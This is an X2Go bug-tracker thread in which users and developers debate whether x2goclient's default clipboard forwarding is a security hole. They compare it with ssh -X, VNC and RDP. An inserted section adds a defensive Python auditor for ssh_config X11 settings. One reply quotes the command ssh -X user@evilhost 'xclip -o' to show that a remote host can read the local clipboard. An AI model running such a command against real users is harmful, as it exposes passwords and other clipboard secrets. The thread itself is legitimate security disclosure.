From: Christoph Anton Mitterer
To: submit@bugs.x2go.org
Date: Mon, 01 Jul 2013 04:38:28 +0200
Subject: SECURITY: x2goclient allows clipboard sniffing

Package: x2goclient
Severity: grave
Tags: security

Hi.

From: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=714588

It seems that per default (and I even found no way to disable it)
x2goclient (and perhaps other related tools?) transmit the content of
the clipboard to the remote host.

As this may easily contain passwords or other sensitive information,
this is an extremely critical hole.

Cheers,
Chris.

Date: Mon, 1 Jul 2013 13:43:56 +0200
From: Alexander Wuerstlein
To: Christoph Anton Mitterer, 258@bugs.x2go.org
Subject: Re: [X2Go-Dev] Bug#258: SECURITY: x2goclient allows clipboard sniffing

On 13-07-01 04:56, Christoph Anton Mitterer wrote:
> Package: x2goclient
> Severity: grave
> Tags: security
>
> Hi.
>
> From: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=714588
>
>
> It seems that per default (and I even found no way to disable it)
> x2goclient (and perhaps other related tools?) transmit the content of
> the clipboard to the remote host.

Yes, other related tools like X11. x2go is basically just a faster
version of the traditional xforwarding. In X11 every client can always
access the clipboard/selection/etc., so you will also have the same
security problems (by design). E.g. 'ssh -X user@evilhost "xclip -o"'
demonstrates this.

> As this may easily contain passwords or other sensitive information,
> this is an extremely critical hole.

I disagree, this is not a hole at all, it works as intended. It's just
that users are often not educated about the implications of passing
around passwords via the clipboard etc.

But I concur that the ability to switch off clipboard/selection/...
forwarding in the x2goagent/x2goclient would be nice to have. Patches
are of course always welcome.

Ciao,

Alexander Wuerstlein.

From: Christoph Anton Mitterer
To: 258@bugs.x2go.org
Date: Mon, 01 Jul 2013 14:43:29 +0200
Subject: Re: [X2Go-Dev] Bug#258: SECURITY: x2goclient allows clipboard sniffing

On Mon, 2013-07-01 at 13:43 +0200, Alexander Wuerstlein wrote:
> Yes, other related tools like X11. x2go is basically just a faster
> version of the traditional xforwarding. In X11 every client can always
> access the clipboard/selection/etc., so you will also have the same
> security problems (by design). E.g. 'ssh -X user@evilhost "xclip -o"'
> demonstrates this.

Well but that "argument" doesn't really count:
1) Just because others do it plainly insecure, you cannot do it like
this as well... like as if Gentoo would say "if Debian breaks their
OpenSSL entropy, we should do so, too"... o.O

2) Literally no one who has a decent mind of security, will allow other
hosts to directly access their X server.. because then you're (security
wise) anyway screwed...

And I thought NX would secure what's sent from remote in order to not
being able to overtake the input/output devices of the hosts (whole)
Xserver).

> I disagree, this is not a hole at all, it works as intended. It's just
> that users are often not educated about the implications of passing
> around passwords via the clipboard etc.

Na I disagree... if even people would be educated (which is not
realistic) it will happen by accident, that you copy sensitive
information... sometimes other programs may do this even automatically
and you can't do anything against it.

Cheers,
Chris.

Date: Mon, 1 Jul 2013 16:01:32 +0200
From: Alexander Wuerstlein
To: Christoph Anton Mitterer, 258@bugs.x2go.org
Subject: Re: [X2Go-Dev] Bug#258: Bug#258: SECURITY: x2goclient allows clipboard sniffing

On 13-07-01 15:03, Christoph Anton Mitterer wrote:
> On Mon, 2013-07-01 at 13:43 +0200, Alexander Wuerstlein wrote:
> > Yes, other related tools like X11. x2go is basically just a faster
> > version of the traditional xforwarding. In X11 every client can always
> > access the clipboard/selection/etc., so you will also have the same
> > security problems (by design). E.g. 'ssh -X user@evilhost "xclip -o"'
> > demonstrates this.
> Well but that "argument" doesn't really count:
> 1) Just because others do it plainly insecure, you cannot do it like
> this as well... like as if Gentoo would say "if Debian breaks their
> OpenSSL entropy, we should do so, too"... o.O

It isn't like that at all, X11 clients and servers have to comply with
the respective parts of the protocol. If the protocol demands insecure
behaviour, it's a design bug, or maybe, like in this case, a compromise
nobody likes: Since in X11 clients handle all the shortcuts and mouse
button events, since clients or toolkits handle the widgets, the only
option to implement C&P is to have clients ask the server for the
clipboard or selection contents. It's more a "there is no other way to do
it except to make it unusable" kind of problem imho.

> 2) Literally no one who has a decent mind of security, will allow other
> hosts to directly access their X server.. because then you're (security
> wise) anyway screwed...

I'm not only talking about 'xhost +' and the like, this would of course
be a major problem for more reasons than only the clipboard. And if you
wouldn't trust a host with 'ssh -X', then you also shouldn't trust it
with x2go. Just think of x2go as a variant of 'ssh -X' with image
compression and some extras. X11 protocol firewalling is not really one
of those extras. And since the x2goclient will always run in your local
X session, it will always be able to read your clipboard.

> And I thought NX would secure what's sent from remote in order to not
> being able to overtake the input/output devices of the hosts (whole)
> Xserver).

In a way, yes. Afaik you can avoid certain attacks of the "I'll attach
to the root window and get all key events" kind since windowed x2go
sessions give you a separate root window. But I imagine there are more
problems out there nobody thought of yet.

Ciao,

Alexander Wuerstlein.

From: Christoph Anton Mitterer
To: 258@bugs.x2go.org
Date: Tue, 02 Jul 2013 03:27:49 +0200
Subject: Re: [X2Go-Dev] Bug#258: Bug#258: SECURITY: x2goclient allows clipboard sniffing

Hey Alexander.

First,... I assume you're one of the NX/X2go developers?

On Mon, 2013-07-01 at 16:01 +0200, Alexander Wuerstlein wrote:
> It isn't like that at all, X11 clients and servers have to comply with
> the respective parts of the protocol. If the protocol demands insecure
> behaviour, it's a design bug, or maybe, like in this case, a compromise
> nobody likes: Since in X11 clients handle all the shortcuts and mouse
> button events, since clients or toolkits handle the widgets, the only
> option to implement C&P is to have clients ask the server for the
> clipboard or selection contents. It's more a "there is no other way to do
> it except to make it unusable" kind of problem imho.

Well first I may have a misunderstanding about how NX works, but more on
that below:

With respect to the issue (transferring the clipboard) itself:
Don't get this in any way offensive! But I think it's plain simple:
It may easily happen that people copy (by intention/accidentally or even
automatically by software) stuff to the clipboard which contains
sensitive information, which in turn can be anything from passwords to
my private love letters ;-)

And people don't see x2go (or VNC, or rdp) like a direct access to their
X server (as in plain X forwarding with xauth and that like).
This might be a misunderstanding... but it's how many similar such
"VNC-like" connections (i.e. a screen output into _one single_ X window)
work.
E.g. when I connect to my qemu virtual machines, I don't have to worry,
that the VM can overtake my X server,... the same for Virtualbox... and
I hope/believe for VNC/TightVNC/etc. and rdp connections (rdesktop and
friends).

This includes that users don't expect (or at least they shouldn't have
to) that such connections allow wiretapping, e.g. if such a system
supports audio forwarding... it shouldn't allow the remote side to
activate my MIC and listen to what I say/sing/etc.
The same holds true for the clipboard... at least per default it
shouldn't be ever sent to the remote side (or vice versa)... and IF one
activates it... people should be warned with big warnings what this
could mean.

That this can indeed lead to compromise showed a recent attack we've had
on one of our institutes' machines, where sensitive information was caught
via an X2go connection and later on used for other attacks.

Now for the technical side... admittedly I don't know the details of how
NX interacts with X... but there must be some way to achieve blocking of
the clipboard sync.
Even if the protocol demands to send some content,... well then simply
hook in and clear it always (per default).

Now more off topic about how NX interacts with X:
I understand that NX is not like VNC, where it's more like send the
pixbuffers.... and where you obviously have not much security problems
in terms of taking over the local X server, since it's more like
displaying JPEGS (of course VNC has much other security problems).
I haven't found out what RDP actually does... but I'd assume it's rather
similar to VNC?

Now with NX I understand it's compression at the X protocol level, so
"no JPEGs being transferred"... but where does the remote's X protocol
go to? Directly into the local X? Or is it taken by NX/X2go and rendered
as if NX/X2go would be an X server that is displayed in a _single_
window of another one (i.e. like Xephyr)?

> And if you
> wouldn't trust a host with 'ssh -X', then you also shouldn't trust it
> with x2go.

Well this is _really_ serious news...
So why? I mean that's what most people expect I guess.. like when you
connect via ssh, that the remote cannot take over your local system...
(unless some serious hole would be found in the ssh client ;) )

> Just think of x2go as a variant of 'ssh -X' with image
> compression and some extras. X11 protocol firewalling is not really one
> of those extras. And since the x2goclient will always run in your local
> X session, it will always be able to read your clipboard.

So it directly goes into the local X server?
Wow... that's awful... like a security nightmare...

> In a way, yes. Afaik you can avoid certain attacks of the "I'll attach
> to the root window and get all key events" kind since windowed x2go
> sessions give you a separate root window. But I imagine there are more
> problems out there nobody thought of yet.

Who would know for sure what is expected to be possible and what not?

I mean don't take this rude... but for me this basically makes NX
unusable, since I basically only use it to connect to more or less
untrusted nodes.
If that means these can take over my X, or even more... then good
night :-/

Cheers,
Chris.

Date: Tue, 2 Jul 2013 11:10:18 +0400
Subject: Re: [X2Go-Dev] Bug#258: Bug#258: Bug#258: SECURITY: x2goclient allows clipboard sniffing
From: Nable 80
To: Christoph Anton Mitterer, 258@bugs.x2go.org, x2go-dev@lists.berlios.de

Hi, Chris.

> So it directly goes into the local X server?
> Wow... that's awful... like a security nightmare...
Then, you don't use ssh -X/-Y, do you?

> And people don't see x2go (or VNC, or rdp) like a direct access
> to their X server (as in plain X forwarding with xauth and that like).
Why do you think so? Because they have it in a window and didn't specify
any option that exactly means 'turn on X11 forwarding'?
After all, I think that it's not a grave issue as most people use X11
forwarding for rather trusted hosts (or just don't care).

One additional note: it's possible to turn on clipboard forwarding in
RDP and VNC (and it's a very useful thing) but AFAIR in most clients
_one has to specify it implicitly_ (and sometimes there's a separate
option that allows some restricted clipboard access, for example:
copying from remote to local but not vice versa). Maybe someone will
make a patch to implement such options in X2Go.

From nable.maininbox@googlemail.com Tue Jul 2 10:01:34 2013
Date: Tue, 2 Jul 2013 12:01:34 +0400
Subject: Re: [X2Go-Dev] Bug#258: Bug#258: Bug#258: Bug#258: SECURITY: x2goclient allows clipboard sniffing
From: Nable 80
To: Christoph Anton Mitterer, 258@bugs.x2go.org, x2go-dev@lists.berlios.de

Sorry, quickfix: s/implicitly/explicitely/

2013/7/2, Nable 80:
> Hi, Chris.
>
>> So it directly goes into the local X server?
>> Wow... that's awful... like a security nightmare...
> Then, you don't use ssh -X/-Y, do you?
>
>> And people don't see x2go (or VNC, or rdp) like a direct access
>> to their X server (as in plain X forwarding with xauth and that like).
> Why do you think so? Because they have it in a window and didn't specify
> any option that exactly means 'turn on X11 forwarding'?
> After all, I think that it's not a grave issue as most people use X11
> forwarding for rather trusted hosts (or just don't care).
>
> One additional note: it's possible to turn on clipboard forwarding in
> RDP and VNC (and it's a very useful thing) but AFAIR in most clients
> _one has to specify it implicitly_ (and sometimes there's a separate
> option that allows some restricted clipboard access, for example:
> copying from remote to local but not vice versa). Maybe someone will
> make a patch to implement such options in X2Go.

From arw@cip.cs.fau.de Tue Jul 2 18:14:57 2013
Date: Tue, 2 Jul 2013 18:07:52 +0200
From: Alexander Wuerstlein
To: x2go-dev@lists.berlios.de
Cc: Christoph Anton Mitterer, 258@bugs.x2go.org
Subject: Re: [X2Go-Dev] Bug#258: Bug#258: Bug#258: SECURITY: x2goclient allows clipboard sniffing
Message-ID: <20130702180752.6b3c8c97@warp>
In-Reply-To: <1372728469.11367.26.camel@fermat.scientia.net>

On Tue, 02 Jul 2013 03:27:49 +0200 Christoph Anton Mitterer wrote:

> Hey Alexander.
>
> First,... I assume you're one of the NX/X2go developers?

I've submitted some patches, yes. But I don't commit things as often as I
would want to.

> On Mon, 2013-07-01 at 16:01 +0200, Alexander Wuerstlein wrote:
> > It isn't like that at all, X11 clients and servers have to comply
> > with the respective parts of the protocol. If the protocol demands
> > insecure behaviour, it's a design bug, or maybe, like in this case,
> > a compromise nobody likes: Since in X11 clients handle all the
> > shortcuts and mouse button events, since clients or toolkits handle
> > the widgets, the only option to implement C&P is to have clients
> > ask the server for the clipboard or selection contents. It's more a
> > "there is no other way to do it except to make it unusable" kind of
> > problem imho.
> Well first I may have a misunderstanding about how NX works, but more
> on that below:
>
> And people don't see x2go (or VNC, or rdp) like a direct access to
> their X server (as in plain X forwarding with xauth and that like).
> This might be a misunderstanding... but it's how many similar such
> "VNC-like" connections (i.e. a screen output into _one single_ X
> window) work.
> E.g. when I connect to my qemu virtual machines, I don't have to
> worry, that the VM can overtake my X server,... the same for
> Virtualbox... and I hope/believe for VNC/TightVNC/etc. and rdp
> connections (rdesktop and friends).

Well, in that aspect, VNC, RDP and x2go/NX are somewhat different. VNC and RDP
basically started from some dumb kind of framebuffer and keyboard/mouse event
forwarding. X11 has a far larger amount of functionality and a huge system of
extensions on top. x2go/NX starts out from X11 and changes some aspects,
pruning things that are slow or unnecessary (e.g. synchronous calls or
uncompressed bitmaps). So while with VNC/RDP you have a very simple starting
point from which you then can add some extensions like clipboards, with
X11/x2go/NX you have everything and need to throw away stuff that might be bad.
People are still in the process of figuring out the bad stuff, and generally it's
the far more hazardous direction of development.

> This includes that users don't expect (or at least they shouldn't have
> to) that such connections allow wiretapping, e.g. if such a system
> supports audio forwarding... it shouldn't allow the remote side to
> activate my MIC and listen to what I say/sing/etc.

Well, if you switch on audio forwarding in RDP, the other side can do exactly
that...

> The same holds true for the clipboard... at least per default it
> shouldn't be ever sent to the remote side (or vice versa)... and IF
> one activates it... people should be warned with big warnings what
> this could mean.

I agree that this would be desirable.

> That this can indeed lead to compromise showed a recent attack we've
> had on one of our institutes' machines, where sensitive information was
> caught via an X2go connection and later on used for other attacks.

Do you have any more in-depth writeup of that attack so we maybe can learn from
it and look at certain things more specifically?

> Now for the technical side... admittedly I don't know the details of
> how NX interacts with X... but there must be some way to achieve
> blocking of the clipboard sync.
> Even if the protocol demands to send some content,... well then simply
> hook in and clear it always (per default).

Yes, that should be possible. It's just that someone has to implement it.

> Now more off topic about how NX interacts with X:
>
> [...]
> Now with NX I understand it's compression at the X protocol level, so
> "no JPEGs being transferred"... but where do remotes X protocol go to?
> Directly into the local X? Or is it taken by NX/X2go and rendered as
> if NX/X2go would be an X server that is displayed in a _single_
> window of another one (i.e. like Xephyr)?

Some protocol calls are taken as is and passed to the local X, others are
"transformed", e.g. made asynchronous, bitmap-compressed, etc.

> > And if you
> > wouldn't trust a host with 'ssh -X', then you also shouldn't trust
> > it with x2go.
> Well this is _really_ serious news...
> So why? I mean that's what most people expect I guess.. like when you
> connect via ssh, that the remote cannot take over your local system...
> (unless some serious hole would be found in the ssh client ;) )

Well, the remote can't take over your system afaik. But there are concerns
about the security of ssh -X vs. -Y. Keystroke monitoring is one of those
concerns.

> > Just think of x2go as a variant of 'ssh -X' with image
> > compression and some extras. X11 protocol firewalling is not really
> > one of those extras. And since the x2goclient will always run in
> > your local X session, it will always be able to read your clipboard.
> So it directly goes into the local X server? Wow... that's awful...
> like a security nightmare...

Yes, it can be.

> > In a way, yes. Afaik you can avoid certain attacks of the "I'll
> > attach to the root window and get all key events" kind since
> > windowed x2go sessions give you a separate root window. But I
> > imagine there are more problems out there nobody thought of yet.
> Who would know for sure what is expected to be possible and what not?
>
> I mean don't take this rude... but for me this basically makes NX
> unusable, since I basically only use it to connect to more or less
> untrusted nodes.
> If that means these can take over my X, or even more... then good
> night :-/

Yes, connections to untrusted hosts are problematic. For this I consider VNC to
be more suited.

Ciao,

Alexander Wuerstlein.

From calestyo@scientia.net Tue Jul 2 19:47:35 2013
Message-ID: <1372787237.7849.101.camel@heisenberg.scientia.net>
Subject: Re: [X2Go-Dev] Bug#258: Bug#258: Bug#258: SECURITY: x2goclient allows clipboard sniffing
From: Christoph Anton Mitterer
To: 258@bugs.x2go.org
Cc: x2go-dev@lists.berlios.de
Date: Tue, 02 Jul 2013 19:47:17 +0200
In-Reply-To: <20130702180752.6b3c8c97@warp>

On Tue, 2013-07-02 at 18:07 +0200, Alexander Wuerstlein wrote:
> Well, in that aspect, VNC, RDP and x2go/NX are somewhat different. VNC and RDP
> basically started from some dumb kind of framebuffer and keyboard/mouse event
> forwarding.
I knew (at least the VNC / RDP part)... and I started to realise the
difference from NX ;)

> X11 has a far larger amount of functionality and a huge system of
> extensions on top.
Sure...

> x2go/NX starts out from X11 and changes some aspects,
> pruning things that are slow or unnecessary (e.g. synchronous calls or
> uncompressed bitmaps). So while with VNC/RDP you have a very simple starting
> point from which you then can add some extensions like clipboards, with
> X11/x2go/NX you have everything and need to throw away stuff that might be bad.
> People are still in the process of figuring out the bad stuff, and generally it's
> the far more hazardous direction of development.
That's the problem... at least security wise...
I mean it's no wonder that no sane person uses ssh -X on other hosts
(especially untrusted ones)... the X protocol is so complex especially
with all extensions.. and the typical attacks like global event grabbing
or a "screen man in the middle attack" where a new full screen window
tricks you into something evil... are probably just the simplest ideas
of attacking.

> > This includes that users don't expect (or at least they shouldn't have
> > to) that such connections allow wiretapping, e.g. if such a system
> > supports audio forwarding... it shouldn't allow the remote side to
> > activate my MIC and listen to what I say/sing/etc.
> Well, if you switch on audio forwarding in RDP, the other side can do exactly
> that...
Sure... but at least you can turn it off (unfortunately many programs
don't do so by default, neither do they warn you what switching it on
means).

> > That this can indeed lead to compromise showed a recent attack we've
> > had on one of our institutes' machines, where sensitive information was
> > caught via an X2go connection and later on used for other attacks.
> Do you have any more in-depth writeup of that attack so we maybe can learn from
> it and look at certain things more specifically?
Well the problem is that I'm not really allowed to give much defaults
(as you can see I also write from my private address)...
Simply said... an attacker took over root on the remote system... and it
seems he did just such sniffing stuff... :/

> > Now for the technical side... admittedly I don't know the details of
> > how NX interacts with X... but there must be some way to achieve
> > blocking of the clipboard sync.
> > Even if the protocol demands to send some content,... well then simply
> > hook in and clear it always (per default).
>
> Yes, that should be possible. It's just that someone has to implement it.
AFAIU, one would need to do that on the nxproxy level then?

> > Now with NX I understand it's compression at the X protocol level, so
> > "no JPEGs being transferred"... but where do remotes X protocol go to?
> > Directly into the local X? Or is it taken by NX/X2go and rendered as
> > if NX/X2go would be an X server that is displayed in a _single_
> > window of another one (i.e. like Xephyr)?
> Some protocol calls are taken as is and passed to the local X, others are
> "transformed", e.g. made asynchronous, bitmap-compressed, etc.
I see...

> Well, the remote can't take over your system afaik. But there are concerns
> about the security of ssh -X vs. -Y. Keystroke monitoring is one of those
> concerns.
Why don't you do the following:
Not passing on any X stuff to the local X server... but starting an
Xephyr server and sending it there?
Admittedly I don't really know how the Xephyr server itself does things
(I once tried to ask the developers but got no reply)... and if that
would really work like a sandbox ...

At least my hope would be (as it was before with VNC/RDP/NX)... that any
evil remote... could at least only take over the one single window...
and in case of Xephyr... hopefully only the single Xephyr window.

First thanks for your answers...

I'd propose the following now:
As this bug is now cluttered all over with two different issues
- clipboard sniffing and the warning when it was activated
- security measures and better documentation about what NX/X2go really
  does
I'd close this bug, and open two new ones, one for each issue...
referencing that old bug... so that all topics can be discussed (perhaps
fixed) in a more simple fashion.

Okay?

Cheers,
Chris.

From calestyo@scientia.net Tue Jul 2 19:58:23 2013
Message-ID: <1372787886.7849.104.camel@heisenberg.scientia.net>
Subject: Re: [X2Go-Dev] Bug#258: Bug#258: Bug#258: SECURITY: x2goclient allows clipboard sniffing
From: Christoph Anton Mitterer
To: x2go-dev@lists.berlios.de, 258@bugs.x2go.org
Date: Tue, 02 Jul 2013 19:58:06 +0200

On Tue, 2013-07-02 at 11:10 +0400, Nable 80 wrote:
> > And people don't see x2go (or VNC, or rdp) like a direct access
> > to their X server (as in plain X forwarding with xauth and that like).
> Why do you think so? Because they have it in a window and didn't specify
> any option that exactly means 'turn on X11 forwarding'?
To be honest, I think both are strong reasons for expecting this... as
well as one easily tends to compare it with VNC (which gives you rather
the "secure" screenshots)...

But moreover... it's nowhere really documented (at least where people
easily see it) - I didn't find it at all.
When one goes into the ssh/ssh_config manpages and reads about the X
forwarding options... it strongly warns one about the security
implications (which are basically like giving root to the remote).
When one reads the xauth manpage (and the fact that there is a dedicated
program which one needs to grant privileges)... one reads about what one
does.

With X2go/NX.. there seem to be no such emphasised warnings in the
obvious places.

> After all, I think that it's not a grave issue as most people use X11
> forwarding for rather trusted hosts (or just don't care).
Well... don't think so... even not for the trusted ones (not to talk
about untrusted hosts)... but this is probably since people have
different requirements on security.

> One additional note: it's possible to turn on clipboard forwarding in
> RDP and VNC (and it's a very useful thing) but AFAIR in most clients
> _one has to specify it implicitly_ (and sometimes there's a separate
> option that allows some restricted clipboard access, for example
Yes... it is... but there you have to at least enable it (even though
most programs miss a strong warning on what can then easily happen...)

But to be honest... the clipboard sniffing problem seems to be "boring"
compared with the "direct interaction" with my local x server... at
least with respect to my security thinking...

Oh and no one from the developers should get me wrong:
I do see that NX is very nice and great with respect to its speed,
which is probably not doable with VNC like screenshotting.... but
a) I think people are not warned/told enough about what happens
(technically)... and
b) clear information misses... on what could actually happen (in the
sense of "is it secure as it is, or can this direct communication with
the local X server cause troubles - perhaps there are none... and the
only issues were those with the global root window.. which seems not
possible with NX? But perhaps there are!).

Cheers,
Chris.
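
The thread repeatedly compares X2Go with `ssh -X`/`-Y` and points to the X forwarding options in ssh_config, so one practical check is which hosts a client configuration forwards X11 to, and whether that forwarding is trusted. The following is an added example, not part of the thread or of X2Go: a small Python auditor that resolves `ForwardX11` and `ForwardX11Trusted` per host from ssh_config text. The sample configuration and host names are constructed; `Match` and `Include` are not evaluated, and the fallback defaults are an assumption (upstream OpenSSH's "no" for both).

```python
import fnmatch
import re

# Constructed sample ssh_config (host names are placeholders, not from the thread).
SAMPLE_CONFIG = """\
# ssh uses the first value it obtains for each option, so specific hosts go first
Host build.example.org
    ForwardX11 yes
    ForwardX11Trusted yes

Host *.lab.example.org !gw.lab.example.org
    ForwardX11 yes

Host *
    ForwardX11 no
    ForwardX11Trusted = no
"""

# Assumed fallbacks when the file sets nothing: upstream OpenSSH defaults.
# A distribution's system-wide ssh_config may differ, so audit that file too.
DEFAULTS = {"forwardx11": "no", "forwardx11trusted": "no"}


def parse_blocks(text):
    """Split ssh_config text into [(host_patterns, {option: value})] in file order.

    Options before the first Host line apply to all hosts. Match blocks and
    Include directives are not evaluated here; options under Match are dropped.
    """
    blocks = [(["*"], {})]
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        # Keyword and argument are separated by whitespace and/or one '='.
        parts = re.split(r"\s*=\s*|\s+", line, maxsplit=1)
        key = parts[0].lower()
        value = parts[1].strip() if len(parts) > 1 else ""
        if key == "host":
            blocks.append((value.split(), {}))
        elif key == "match":
            blocks.append(([], {}))  # empty pattern list never matches
        else:
            # Within one block, the first occurrence of an option wins as well.
            blocks[-1][1].setdefault(key, value.lower())
    return blocks


def host_matches(host, patterns):
    """A Host line applies if a positive pattern matches and no '!pattern' does."""
    matched = False
    for pattern in patterns:
        if pattern.startswith("!"):
            if fnmatch.fnmatchcase(host, pattern[1:]):
                return False
        elif fnmatch.fnmatchcase(host, pattern):
            matched = True
    return matched


def x11_exposure(host, config_text):
    """Return 'none', 'untrusted' or 'trusted' X11 forwarding for host."""
    effective = {}
    for patterns, options in parse_blocks(config_text):
        if host_matches(host, patterns):
            for key in DEFAULTS:
                if key in options:
                    effective.setdefault(key, options[key])
    forward = effective.get("forwardx11", DEFAULTS["forwardx11"])
    trusted = effective.get("forwardx11trusted", DEFAULTS["forwardx11trusted"])
    if forward != "yes":
        return "none"
    # Trusted forwarding gives remote X11 clients full access to the local display.
    return "trusted" if trusted == "yes" else "untrusted"


def audit(hosts, config_text):
    """Map each host to its exposure level so risky entries can be reviewed."""
    return {host: x11_exposure(host, config_text) for host in hosts}


if __name__ == "__main__":
    for name, level in audit(
        ["build.example.org", "ws1.lab.example.org", "gw.lab.example.org"],
        SAMPLE_CONFIG,
    ).items():
        print(f"{name}: X11 forwarding {level}")
```

Hosts reported as "trusted" are the ones to review first when the remote side is not fully trusted.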
--=-zytB+CyUK584+ZxoPFn9 Content-Type: application/x-pkcs7-signature; name="smime.p7s" Content-Disposition: attachment; filename="smime.p7s" Content-Transfer-Encoding: base64
--=-zytB+CyUK584+ZxoPFn9--
From Moritz.Struebe@informatik.uni-erlangen.de Wed Jul 3 10:20:33 2013 Received: (at 258) by bugs.x2go.org; 3 Jul 2013 08:20:34 +0000 X-Spam-Checker-Version: SpamAssassin 3.3.2 (2011-06-06) on ymir.das-netzwerkteam.de X-Spam-Level: X-Spam-Status: No, score=0.0 required=5.0 tests=RCVD_IN_DNSWL_BLOCKED, T_FILL_THIS_FORM_SHORT,URIBL_BLOCKED autolearn=ham version=3.3.2 X-Greylist: delayed 399 seconds by postgrey-1.34 at ymir; Wed, 03 Jul 2013 10:20:33 CEST Received: from faui40.informatik.uni-erlangen.de (faui40.informatik.uni-erlangen.de [131.188.34.40]) by ymir (Postfix) with ESMTPS id C54FE5DB13 for
<258@bugs.x2go.org>; Wed, 3 Jul 2013 10:20:33 +0200 (CEST) Received: from [IPv6:2001:638:a000:4134::ffff:51] (faui48e.informatik.uni-erlangen.de [IPv6:2001:638:a000:4134::ffff:51]) by faui40.informatik.uni-erlangen.de (Postfix) with ESMTP id A8DA358C6E6; Wed, 3 Jul 2013 10:13:53 +0200 (CEST) Message-ID: <51D3DD41.70605@informatik.uni-erlangen.de> Date: Wed, 03 Jul 2013 10:13:53 +0200 
From: Moritz Struebe Organization: Uni Erlangen-Nuernberg User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:17.0) Gecko/20130620 Thunderbird/17.0.7 MIME-Version: 1.0 To: Christoph Anton Mitterer , 258@bugs.x2go.org, x2go-dev@lists.berlios.de Subject: Re: [X2Go-Dev] Bug#258: Bug#258: Bug#258: Bug#258: SECURITY: x2goclient allows clipboard sniffing References: <1372646308.18508.2.camel@heisenberg.scientia.net> <20130701114356.GP2447@cip.informatik.uni-erlangen.de> <1372682609.25918.14.camel@heisenberg.scientia.net> <20130701140132.GQ2447@cip.informatik.uni-erlangen.de> <1372728469.11367.26.camel@fermat.scientia.net> <20130702180752.6b3c8c97@warp> <1372787237.7849.101.camel@heisenberg.scientia.net> In-Reply-To: <1372787237.7849.101.camel@heisenberg.scientia.net> X-Enigmail-Version: 1.5.1 Content-Type: multipart/signed; protocol="application/pkcs7-signature"; micalg=sha1; boundary="------------ms070501030000090102000703"

This is a cryptographically signed message in MIME format.

--------------ms070501030000090102000703 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable

Hey.

On 2013-07-02 19:47, Christoph Anton Mitterer wrote:
> I'd propose the following now:
> As this bug is now cluttered all over with two different issues
> - clipboard sniffing and the warning when it was activated
> - security measures and better documentation about what NX/X2go really
> does
>
> I'd close this bug, and open two new ones, one for each issue...
> referencing that old bug... so that all topics can be discussed (perhaps
> fixed) in a more simple fashion.

I think this is a good idea. I just want to warn you that this issue will not have a very high priority, as most/all core devs work in scenarios where host _and_ client are trusted. Nonetheless contributions to the documentation are very welcome, and can be easily contributed without coding skills. ;) - If you need pointers on getting started feel free to ask.

Morty

--
Dipl.-Ing.
Moritz 'Morty' Struebe (Wissenschaftlicher Mitarbeiter) Lehrstuhl für Informatik 4 (Verteilte Systeme und Betriebssysteme) Friedrich-Alexander-Universität Erlangen-Nürnberg Martensstr. 1 91058 Erlangen Tel : +49 9131 85-25419 Fax : +49 9131 85-28732 eMail : struebe@informatik.uni-erlangen.de WWW : http://www4.informatik.uni-erlangen.de/~morty
--------------ms070501030000090102000703 Content-Type: application/pkcs7-signature; name="smime.p7s" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="smime.p7s" Content-Description: S/MIME Kryptografische Unterschrift
--------------ms070501030000090102000703--
From mike.gabriel@das-netzwerkteam.de Tue Jan 28 16:49:11 2014 Received: (at 258) by bugs.x2go.org; 28 Jan 2014 15:49:12 +0000 X-Spam-Checker-Version: SpamAssassin 3.3.2 (2011-06-06) on ymir.das-netzwerkteam.de X-Spam-Level: X-Spam-Status: No, score=-1.9 required=5.0 tests=BAYES_00 autolearn=ham version=3.3.2 Received: from freya.das-netzwerkteam.de (freya.das-netzwerkteam.de [88.198.48.199]) by ymir (Postfix) with ESMTPS id 87B575DB13 for <258@bugs.x2go.org>; Tue, 28 Jan 2014 16:49:11 +0100 (CET) Received:
from grimnir.das-netzwerkteam.de (grimnir.das-netzwerkteam.de [78.46.204.98]) by freya.das-netzwerkteam.de (Postfix) with ESMTPS id F3494ADC; Tue, 28 Jan 2014 16:49:10 +0100 (CET) Received: from localhost (localhost [127.0.0.1]) by grimnir.das-netzwerkteam.de (Postfix) with ESMTP id C9C433C737; Tue, 28 Jan 2014 16:49:10 +0100 (CET) X-Virus-Scanned: Debian amavisd-new at grimnir.das-netzwerkteam.de Received: from grimnir.das-netzwerkteam.de ([127.0.0.1]) by localhost (grimnir.das-netzwerkteam.de [127.0.0.1]) (amavisd-new, port 10024) with ESMTP id ip4Pu142FKAz; Tue, 28 Jan 2014 16:49:10 +0100 (CET) Received: from grimnir.das-netzwerkteam.de (localhost [127.0.0.1]) by grimnir.das-netzwerkteam.de (Postfix) with ESMTPSA id 9F6D03C324; Tue, 28 Jan 2014 16:49:10 +0100 (CET) Received: from 195.244.234.222 ([195.244.234.222]) by mail.das-netzwerkteam.de (Horde Framework) with HTTP; Tue, 28 Jan 2014 15:49:10 +0000 Date: Tue, 28 Jan 2014 15:49:10 +0000 Message-ID: <20140128154910.Horde.bz7_7CdkDRplg9xdW4kZbg2@mail.das-netzwerkteam.de> 
From: Mike Gabriel To: x2go-user@lists.berlios.de Cc: 258@bugs.x2go.org Subject: Re: [X2Go-User] Limiting clipboard sharing References: <52E69B93.8010904@sourcecap.ch> In-Reply-To: <52E69B93.8010904@sourcecap.ch> User-Agent: Internet Messaging Program (IMP) H5 (6.1.4) Accept-Language: en,de Organization: DAS-NETZWERKTEAM X-Originating-IP: 195.244.234.222 X-Remote-Browser: Mozilla/5.0 (X11; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0 Iceweasel/26.0 Content-Type: multipart/signed; boundary="=_07l0yBSoJq8RBmtev9FzKA7"; protocol="application/pgp-signature"; micalg=pgp-sha1 MIME-Version: 1.0

This message is in MIME format and has been PGP signed.

--=_07l0yBSoJq8RBmtev9FzKA7 Content-Type: text/plain; charset=utf-8; format=flowed; DelSp=Yes Content-Disposition: inline

Hi Kris,

On Mo 27 Jan 2014 18:46:59 CET, Kris Ilowiecki wrote:
> Hello,
>
> I am quite new to X2Go, and really impressed by it. I'd like to
> switch from opennx to X2Go, but I can't find a way to limit
> clipboard sharing.
>
> Opennx, as well as other NX forks, has the options to enable clipboard
> sharing both ways, one-way, or disable it completely. So far I have
> failed to find a setting to limit this in X2Go.
>
> I'd need clipboard sharing to work only in the client->server
